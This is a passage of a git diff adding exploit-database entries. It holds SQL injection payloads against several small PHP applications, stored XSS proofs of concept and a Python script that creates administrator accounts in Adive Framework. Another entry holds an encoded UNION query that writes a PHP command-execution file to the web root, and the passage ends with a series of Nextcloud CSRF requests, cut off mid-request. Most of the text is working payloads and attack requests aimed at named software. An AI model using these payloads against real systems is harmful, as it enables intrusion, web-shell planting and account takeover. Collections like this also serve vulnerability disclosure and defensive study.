+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
+(SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit
+
+# Changeset:
+# Issue fixed in version 6.2
+# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2180197%40wp-google-places-review-slider&old=2163061%40wp-google-places-review-slider&sfp_email=&sfph_mail=
+
+Cheers!
+PrincyEdward
\ No newline at end of file
diff --git a/exploits/php/webapps/47569.txt b/exploits/php/webapps/47569.txt
new file mode 100644
index 000000000..e36df60a8
--- /dev/null
+++ b/exploits/php/webapps/47569.txt
@@ -0,0 +1,25 @@
+# Exploit Title: TheJshen contentManagementSystem 1.04 - 'id' SQL Injection
+# Date: 2019-11-01
+# Exploit Author: Cakes
+# Vendor Homepage: https://github.com/thejshen/contentManagementSystem
+# Version: 1.04
+# Software Link: https://github.com/thejshen/contentManagementSystem.git
+# Tested on: CentOS7
+
+# GET parameter 'id' easy SQL Injection
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=4' AND 5143=5143-- OWXt
+    Vector: AND [INFERENCE]
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=4' AND (SELECT 4841 FROM (SELECT(SLEEP(5)))eqmp)-- ZwTG
+    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 5 columns
+    Payload: id=-4903' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706b71,0x66766f636c546750775053685352676c4f70724d714c4b64494e755252765a626370615a565a4b49,0x717a6a7671),NULL,NULL-- hkoh
+    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]
\ No newline at end of file
diff --git a/exploits/php/webapps/47581.txt b/exploits/php/webapps/47581.txt
new file mode 100644
index 000000000..43edde4ed
--- /dev/null
+++ b/exploits/php/webapps/47581.txt
@@ -0,0 +1,29 @@
+# Exploit Title: thejshen Globitek CMS 1.4 - 'id' SQL Injection
+# Date: 2019-11-01
+# Exploit Author: Cakes
+# Vendor Homepage: https://github.com/thejshen/contentManagementSystem
+# Software Link: https://github.com/thejshen/contentManagementSystem.git
+# Version: 1.4
+# Tested on: CentOS 7
+# CVE: N/A
+
+# The GET request for content ID is vulnerable to Union, Bolean and Time-Based Blind SQL injection
+
+# Parameter: id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Vector: AND [INFERENCE]
+
+Payload: id=4' AND 5143=5143-- OWXt
+    
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+Payload: id=4' AND (SELECT 4841 FROM (SELECT(SLEEP(5)))eqmp)-- ZwTG
+    
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 5 columns
+# Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]    
+    
+Payload: id=-4903' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706b71,0x66766f636c546750775053685352676c4f70724d714c4b64494e755252765a626370615a565a4b49,0x717a6a7671),NULL,NULL-- hkoh
\ No newline at end of file
diff --git a/exploits/php/webapps/47583.txt b/exploits/php/webapps/47583.txt
new file mode 100644
index 000000000..71ffa7018
--- /dev/null
+++ b/exploits/php/webapps/47583.txt
@@ -0,0 +1,26 @@
+# Exploit Title: thrsrossi Millhouse-Project 1.414 - 'content' Persistent Cross-Site Scripting
+# Date: 2019-11-01
+# Exploit Author: Cakes
+# Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
+# Software Link: https://github.com/thrsrossi/Millhouse-Project.git
+# Version: 1.414
+# Tested on: CentOS 7
+# CVE: N/A
+
+# PoC for this XSS attack
+
+POST /includes/add_comment_sql.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/views/single_post.php?post_id=53
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 59
+Cookie: PHPSESSID=0sqr9kui308rq66ol1uu5olb94; submenu1=block; showips=10; showurls=10; showreferers=10
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+content=%3Cscript%3Ealert%28%22TEST%22%29%3B%3C%2Fscript%3E
\ No newline at end of file
diff --git a/exploits/php/webapps/47585.txt b/exploits/php/webapps/47585.txt
new file mode 100644
index 000000000..23a01c970
--- /dev/null
+++ b/exploits/php/webapps/47585.txt
@@ -0,0 +1,30 @@
+# Exploit Title: rimbalinux AhadPOS 1.11 - 'alamatCustomer' SQL Injection
+# Date: 2019-11-01
+# Exploit Author: Cakes
+# Vendor Homepage: https://github.com/rimbalinux/AhadPOS
+# Software Link: https://github.com/rimbalinux/AhadPOS.git
+# Version: 1.11
+# Tested on: CentOS 7
+# CVE: N/A
+
+# PoC for time-based and boolean based blind SQL injection
+
+# Parameter: alamatCustomer (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])    
+    
+Payload: namaCustomer=test&alamatCustomer=test'||(SELECT 0x4b686f74 FROM DUAL WHERE 8368=8368 AND (SELECT 9520 FROM (SELECT(SLEEP(5)))gtad))||'&telpCustomer=12312345&keterangan=tester
+
+# Parameter: barcode (POST)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause
+# Vector: OR [INFERENCE]    
+    
+Payload: barcode=-3529' OR 4127=4127-- HRDC&jumBarang=1&btnTambah=(t) Tambah
+    
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])    
+    
+Payload: barcode=123' AND (SELECT 1256 FROM (SELECT(SLEEP(5)))Nhnk)-- zXsC&jumBarang=1&btnTambah=(t) Tambah
\ No newline at end of file
diff --git a/exploits/php/webapps/47587.txt b/exploits/php/webapps/47587.txt
new file mode 100644
index 000000000..d921c8290
--- /dev/null
+++ b/exploits/php/webapps/47587.txt
@@ -0,0 +1,27 @@
+# Exploit Title: html5_snmp 1.11 - 'Remark' Persistent Cross-Site Scripting
+# Date: 2019-11-01
+# Exploit Author: Cakes
+# Vendor Homepage: https://github.com/lolypop55/html5_snmp
+# Software Link: https://github.com/lolypop55/html5_snmp.git
+# Version: 1.11
+# Tested on: CentOS 7
+# CVE: N/A
+
+# PoC
+
+POST /add_router_operation.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/add_router.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 128
+Cookie: submenu1=block; showips=10; showurls=10; showreferers=10; PHPSESSID=9m6bv15esubafglv5cnbcha421
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+
+Router_ID=ID&Router_Name=Name&Router_IP=IP&String=STRING&Remark=%3Cscript%3Ealert%28%22test5%22%29%3B%3C%2Fscript%3E&Submit=Save
\ No newline at end of file
diff --git a/exploits/php/webapps/47588.txt b/exploits/php/webapps/47588.txt
new file mode 100644
index 000000000..6cef7d42e
--- /dev/null
+++ b/exploits/php/webapps/47588.txt
@@ -0,0 +1,57 @@
+# Exploit Title: html5_snmp 1.11 - 'Router_ID' SQL Injection
+# Date: 2019-11-01
+# Exploit Author: Cakes
+# Vendor Homepage: https://github.com/lolypop55/html5_snmp
+# Software Link: https://github.com/lolypop55/html5_snmp.git
+# Version: 1.11
+# Tested on: CentOS 7
+# CVE: N/A
+
+# PoC for error, time, boolean and Union based SQL Injection
+
+# Parameter: Router_ID (POST)
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    
+    
+Payload: Router_ID=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aJYp'='aJYp&Router_Name=123&Router_IP=123&String=123&Remark=123&Submit=Save
+
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])   
+    
+Payload: Router_ID=123' AND (SELECT 7074 FROM (SELECT(SLEEP(5)))hDkA) AND 'koRt'='koRt&Router_Name=123&Router_IP=123&String=123&Remark=123&Submit=Save
+
+# Parameter: Router_IP (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Vector: AND [INFERENCE]   
+    
+Payload: Router_IP=192.168.0.1' AND 3390=3390-- yUHk
+    
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])    
+    
+Payload: Router_IP=192.168.0.1' AND (SELECT 2831 FROM (SELECT(SLEEP(5)))SwFp)-- VukE
+    
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 5 columns
+# Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL[GENERIC_SQL_COMMENT]    
+    
+Payload: Router_IP=192.168.0.1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787071,0x4f4f4e6c58704e78566b76576358564c4e5145575543435658706d4e50476d6a6c65505366497571,0x7170717671),NULL-- BEdT
+
+# Pop a Shell :-)
+
+GET /get_router_show.php?Router_IP=%27%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%30%78%33%33%63%33%66%37%30%36%38%37%30%32%30%32%34%36%33%36%64%36%34%32%30%33%64%32%30%37%33%36%38%36%35%36%63%36%63%35%66%36%35%37%38%36%35%36%33%32%38%32%34%35%66%34%37%34%35%35%34%35%62%32%37%36%33%36%64%36%34%32%37%35%64%32%39%33%62%32%30%36%35%36%33%36%38%36%66%32%30%32%34%36%33%36%64%36%34%33%62%32%30%33%66%33%65%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%20%49%4e%54%4f%20%44%55%4d%50%46%49%4c%45%20%27%2f%76%61%72%2f%77%77%77%2f%73%6e%6d%70%30%31%2f%75%70%6c%6f%61%64%73%2f%65%78%65%63%2e%70%68%70%27%2d%2d%20%44%52%74%66 HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://Target/get_router.php
+Cookie: PHPSESSID=ii1kfjgplci8vbfep3ius67353
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+Cache-Control: max-age=0
\ No newline at end of file
diff --git a/exploits/php/webapps/47600.py b/exploits/php/webapps/47600.py
new file mode 100755
index 000000000..3657c0e17
--- /dev/null
+++ b/exploits/php/webapps/47600.py
@@ -0,0 +1,82 @@
+# Exploit Title: Adive Framework 2.0.7 - Privilege Escalation
+# Date: 2019-08-02
+# Exploit Author: Pablo Santiago
+# Vendor Homepage: https://www.adive.es/
+# Software Link: https://github.com/ferdinandmartin/adive-php7
+# Version: 2.0.7
+# Tested on: Windows 10
+# CVE : CVE-2019-14347
+
+#Exploit
+
+import requests
+import sys
+
+session = requests.Session()
+
+http_proxy  = "http://127.0.0.1:8080"
+https_proxy = "https://127.0.0.1:8080"
+
+proxyDict = {
+             "http"  : http_proxy,
+             "https" : https_proxy
+           }
+print('[*****************************************]')
+print('[ BYPASSING Adive Framework Version.2.0.5 ]')
+print('[*****************************************]''\n')
+
+
+
+print('[+]Login with the correct credentials:' '\n')
+
+user = input('[+]user:')
+password = input('[+]password:')
+print('\n')
+
+url = 'http://localhost/adive/admin/login'
+values = {'user': user,
+          'password': password,
+          }
+
+r = session.post(url, data=values, proxies=proxyDict)
+cookie = session.cookies.get_dict()['PHPSESSID']
+
+print('Your session cookie is:'+ cookie +'\n')
+
+
+host = sys.argv[1]
+print('Create the new user:')
+userName = input('[+]User:')
+userUsername = input('[+]UserName:')
+password = input('[+]Password:')
+password2 = input('[+]Confirm Password:')
+print('The possibles permission are: 1: Administrator, 2: Developer, 3:Editor')
+permission = input('[+]permission:')
+
+if (password == password2):
+#configure proxy burp
+
+#hacer el request para la creacion de usuario
+data = {
+'userName':userName,
+'userUsername':userUsername,
+'pass':password,
+'cpass':password2,
+'permission':permission,
+
+}
+
+headers= {
+'Cookie': 'PHPSESSID='+cookie
+}
+
+request = session.post(host+'/adive/admin/user/add', data=data,
+headers=headers, proxies=proxyDict)
+print('+--------------------------------------------------+')
+
+else:
+print ('Passwords dont match!!!')
+
+#PoC
+https://imgur.com/dUgLYi6
+https://hackpuntes.com/wp-content/uploads/2019/08/ex.gif
\ No newline at end of file
diff --git a/exploits/php/webapps/47603.txt b/exploits/php/webapps/47603.txt
new file mode 100644
index 000000000..cafb15443
--- /dev/null
+++ b/exploits/php/webapps/47603.txt
@@ -0,0 +1,314 @@
+# Exploit Title: Nextcloud 17 - Cross-Site Request Forgery
+# Date: 08.11.2019
+# Exploit Author: Ozer Goker
+# Vendor Homepage: https://nextcloud.com
+# Software Link: https://nextcloud.com/install/#instructions-server
+# Version: 17
+# CVE: N/A
+
+
+#Nextcloud offers the industry-leading, on-premises content collaboration
+platform.
+#Our technology combines the convenience and ease of use of consumer-grade
+solutions like Dropbox and Google Drive with the security, privacy and
+control business #needs.
+
+##################################################################################################################################
+
+# CSRF1
+# Create Folder
+
+MKCOL /remote.php/dav/files/ogoker/test HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+requesttoken:
+NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M=
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
+nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
+
+
+##################################################################################################################################
+
+# CSRF2
+# Delete Folder
+
+DELETE /remote.php/dav/files/ogoker/test HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+requesttoken:
+NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M=
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
+nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
+
+
+##################################################################################################################################
+
+# CSRF3
+# Create User
+
+POST /ocs/v2.php/cloud/users HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/plain, /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/json;charset=utf-8
+requesttoken:
+qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I=
+Content-Length: 129
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
+nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
+
+{"userid":"test","password":"test1234","displayName":"","email":"","groups":[],"subadmin":[],"quota":"default","language":"en"}
+
+
+
+##################################################################################################################################
+
+# CSRF4
+# Delete User
+
+DELETE /ocs/v2.php/cloud/users/test HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/plain, /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+requesttoken:
+qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I=
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
+nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
+
+
+##################################################################################################################################
+
+# CSRF5
+# Disable User
+
+PUT /ocs/v2.php/cloud/users/test/disable HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/plain, /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+requesttoken:
+3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0=
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
+nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
+Content-Length: 0
+
+
+##################################################################################################################################
+
+# CSRF6
+# Enable User
+
+PUT /ocs/v2.php/cloud/users/test/enable HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/plain, /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+requesttoken:
+3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0=
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
+nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
+Content-Length: 0
+
+
+##################################################################################################################################
+
+# CSRF7
+# Create Group
+
+POST /ocs/v2.php/cloud/groups HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/plain, /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/json;charset=utf-8
+requesttoken:
+EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g=
+Content-Length: 18
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+redirect=1; testing=1
+
+{"groupid":"test"}
+
+
+##################################################################################################################################
+
+# CSRF8
+# Delete Group
+
+DELETE /ocs/v2.php/cloud/groups/test HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/plain, /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+requesttoken:
+EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g=
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+redirect=1; testing=1
+
+
+##################################################################################################################################
+
+# CSRF9
+# Change User Full Name
+
+
+PUT /settings/users/ogoker/settings HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/javascript, /; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/json
+requesttoken:
+nvnWCslz6So+9VRA8Vg8043tt1pf1wL/ysi2ak1J6es=:z5yuT+YrmAERmx0LhmBllPSJ/WISv2mUuL36IB4ru6I=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 266
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+redirect=1; testing=1
+
+{"displayname":"Ozer
+Goker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"}
+
+
+##################################################################################################################################
+
+# CSRF10
+# Change User Email
+
+PUT /settings/users/ogoker/settings HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/javascript, /; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/json
+requesttoken:
+I+6bC+nRvx4TyTudd4pzZrOucr8qlgwe0YE3v13+fOw=:covjTsaJzjU8p3LWALIqIcrKOIdn/md1o/R79Q6cLqU=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 271
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+redirect=1; testing=1
+
+{"displayname":"ogoker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"test@test
+","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"}
+
+
+##################################################################################################################################
+
+# CSRF11
+# Change Language
+
+PUT /ocs/v2.php/cloud/users/ogoker HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+mRN2MXrwRQuE/fuQ5PNtyp4ulgYRocB99vbydSi8i+E=:yHYOdFWoNCCrk7Lbk8s0jedK3D5cyasWhIO+P3ve2ag=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 21
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+redirect=1; testing=1
+
+key=language&value=tr
+
+
+##################################################################################################################################
+
+# CSRF12
+# Change User Password
+
+POST /settings/personal/changepassword HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+0OhP82O7tEe/0gbwiEPrkFfuU9StyaiXNi0yqg02wT4=:gY03tkzjxWyQvE+7/3uy1y6KGezgocP8RFh+4F5Uk3c=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 70
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
